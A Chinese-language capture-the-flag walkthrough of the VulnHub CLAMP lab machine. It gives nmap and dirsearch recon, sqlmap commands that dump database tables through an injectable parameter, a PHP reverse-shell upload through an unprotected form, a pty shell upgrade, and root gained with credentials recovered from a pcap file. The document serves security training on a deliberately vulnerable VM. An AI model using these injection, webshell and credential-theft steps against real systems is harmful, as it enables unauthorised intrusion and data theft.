一、靶机信息收集
1、靶机下载地址
https://download.vulnhub.com/clamp/CLAMP-Machine-v1.0.1.zip
2、靶机IP扫描
3、探测靶机主机、端口、服务
nmap -sS -sV -A -p- 192.168.31.156
4、靶机目录扫描
dirsearch -u http://192.168.31.156
二、web渗透测试
1、访问靶机IP
查看源码
提示让收集更多信息
2、访问 /nt4stopc/
下面是一些判断题,对与错对应1与0
最后结果为0110111001,拼接访问
3、发现是个新的web页面,查找漏洞功能点
4、点击图片,发现有参数,尝试sql注入
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --random-agent --batch
测试数据库
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --random-agent --batch
查看tatil 下表名
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil --tables --random-agent --batch
获取gereksiz的数据
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil -T gereksiz --dump --random-agent --batch
拿到一串加密值
5、解密
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
拼接访问
再拼接 upload.php
得到一个文件上传点
发现没有提交按钮,自己在前端给加一个
<input type="submit">
6、kali 生成反弹 shell
locate php-reverse-shell.php 查询
cp /usr/share/webshells/php/php-reverse-shell.php . 复制
vi php-reverse-shell.php 编辑
7、上传文件
上传该文件后,返回了文件路径,文件名为md5加密后的
osas/2ad6bded962b884337eaeb921d7c2764.php
访问文件,成功反弹shell
三、提权
1、改为python 交互性shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
2、在 /var/www/html 下发现 important.pcapng
查看文件,发现内容
url解码,得到账户密码
mkelepce:mklpc-osas112.
3、ssh连接
4、查看当前权限
直接sudo su提权
提权成功!!!